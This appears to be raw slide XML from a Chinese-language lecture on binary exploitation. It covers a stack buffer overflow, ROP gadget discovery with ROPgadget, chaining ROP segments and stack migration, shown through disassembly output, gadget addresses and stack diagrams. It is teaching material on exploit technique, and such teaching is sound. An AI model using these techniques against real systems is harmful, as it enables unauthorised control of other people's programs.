            <a:off x="1683483" y="6489396"/>
            <a:ext cx="8973553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objdump -S ./bof|more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./bof:     file format elf32-i386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...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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048330</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;gets@plt&gt;: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8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804a00c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8048336:       68 00 00 00 00          push   $0x0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1714" name="root@Ubuntu : tmp ➤ ROPgadget --binary ./easy_nx |grep &quot;: pop edi ; pop ebp ; ret&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="9278103"/>
            <a:ext cx="8973553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ROPgadget --binary ./easy_nx |grep ": pop edi ; pop ebp ; ret"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F7509D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 b="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-13999"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="531B93"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop edi</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="7499"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="7499"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1715" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9346985"/>
            <a:ext cx="96831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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1716" name="pop ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14759844" y="6837673"/>
            <a:ext cx="175680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/>
            <a:r>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1717" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15077741" y="7699163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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1718" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16032670" y="8017933"/>
            <a:ext cx="1078458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19" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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gggg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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gggg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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13642877" y="8386669"/>
            <a:ext cx="3557152" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF26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23" name="ret ; ret ; ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5325329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ret ; ret ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1724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725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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1726" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="15369880" y="964804"/>
          <a:ext cx="7267638" cy="1714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627468"/>
                <a:gridCol w="3627468"/>
              </a:tblGrid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EDI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0x080484aa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EBP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0xf0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ESP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4">
                              <a:lumOff val="-10627"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0xec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="5672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</a:rPr>
                        <a:t>EIP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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x63636363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727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28" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="105194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29" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="96685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30" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="88430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31" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="8004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32" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="7153989"/>
            <a:ext cx="3635017" cy="840741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33" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="63140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34" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="5475870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35" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="4648651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36" name="stack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18424430" y="3709710"/>
            <a:ext cx="117123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1737" name="Low"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="4304029"/>
            <a:ext cx="9428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738" name="High"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934531" y="12686030"/>
            <a:ext cx="104443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739" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="4750251"/>
            <a:ext cx="5613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740" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="121958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41" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17192541" y="11357689"/>
            <a:ext cx="3635017" cy="840741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42" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="89446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aaaa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1743" name="0x080484aa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="6391499"/>
            <a:ext cx="262119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0x080484aa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1744" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="7229699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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1745" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8067899"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1746" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20902620" y="6007940"/>
            <a:ext cx="109555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0xe0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1747" name="0x08048330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17699451" y="5591889"/>
            <a:ext cx="262119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0x08048330</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1748" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="6489396"/>
            <a:ext cx="8973553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objdump -S ./bof|more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./bof:     file format elf32-i386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       ...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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048330</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;gets@plt&gt;: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8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804a00c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t> 8048336:       68 00 00 00 00          push   $0x0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749" name="root@Ubuntu : tmp ➤ ROPgadget --binary ./easy_nx |grep &quot;: pop edi ; pop ebp ; ret&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683483" y="9278103"/>
            <a:ext cx="8973553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A9A9A9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>
                <a:solidFill>
                  <a:srgbClr val="C7B939"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4EC5DA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>➤ </a:t>
            </a:r>
            <a:r>
              <a:t>ROPgadget --binary ./easy_nx |grep ": pop edi ; pop ebp ; ret"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000">
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
                <a:latin typeface="DejaVu Sans Mono for Powerline"/>
                <a:ea typeface="DejaVu Sans Mono for Powerline"/>
                <a:cs typeface="DejaVu Sans Mono for Powerline"/>
                <a:sym typeface="DejaVu Sans Mono for Powerline"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-13999"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>0x080484aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="7499"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pop edi ; pop ebp ; ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1750" name="0xf0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20908970" y="9346985"/>
            <a:ext cx="96831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0xf0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15077741" y="8520430"/>
            <a:ext cx="96831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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1752" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16032670" y="8839200"/>
            <a:ext cx="1078458" cy="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53" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="13689729" y="2902733"/>
            <a:ext cx="1" cy="5525268"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF26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54" name="ret"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15243052" y="7672930"/>
            <a:ext cx="6376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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1755" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13638550" y="2939777"/>
            <a:ext cx="1614044" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF26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56" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="97828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gggg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1757" name="gggg"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="10621089"/>
            <a:ext cx="11212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4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>gggg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1758" name="完全控制程式流程"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472805" y="6174104"/>
            <a:ext cx="7425691" cy="1367791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627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完全控制程式流程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8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ROP chain"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="4740881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ROP chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1761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762" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="564820"/>
            <a:ext cx="478071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/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BFBFBF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763" name="當使用一次ROP無法解決時使用…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="953359"/>
            <a:ext cx="9270653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4800"/>
            </a:pPr>
            <a:r>
              <a:t>當使用一次ROP無法解決時使用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將多段ROP鏈結起來</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Stack Migrate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1829" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2611506" y="3806698"/>
            <a:ext cx="19148287" cy="9693362"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="19148286" cy="9693360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1764" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="764797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65" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="680977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66" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="595887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67" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="513337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68" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="429517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69" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="3444279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70" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="26043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71" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="176615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72" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="93894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73" name="buf2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15758724" y="0"/>
              <a:ext cx="993985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buf2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1774" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="18103837" y="594319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1775" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="18103850" y="8976320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1776" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="848617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77" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14361859" y="7647979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78" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="7727480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79" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="6889280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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="6038380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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5212880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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4374680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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3523780"/>
              <a:ext cx="3635016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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2683861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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1845661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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1018442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7" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1231889" y="79501"/>
              <a:ext cx="1171238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stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1788" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741977" y="673820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1789" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741990" y="9055820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1790" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536837" y="1120042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1791" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536837" y="1961680"/>
              <a:ext cx="56134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1792" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8565680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93" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="7727480"/>
              <a:ext cx="3635016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94" name="Leave;ret;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="796490" y="6174065"/>
              <a:ext cx="213743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942192"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Leave;ret;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1795" name="gets.plt"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1028403" y="5319971"/>
              <a:ext cx="15782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gets.plt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1796" name="buf1.address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="491430" y="7028160"/>
              <a:ext cx="274755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9300"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>buf1.address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1797" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1256892" y="2762601"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1798" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1256892" y="3600801"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1799" name="buf1 - 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990229" y="4488159"/>
              <a:ext cx="1654558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buf1 - 4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1800" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="772748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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="688928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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="603838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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="521288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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="437468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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="3523780"/>
              <a:ext cx="3635017" cy="840741"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="2683861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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="1845661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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7062861" y="1018442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9" name="buf1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8477460" y="79501"/>
              <a:ext cx="99398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buf1</a:t>
              </a:r>
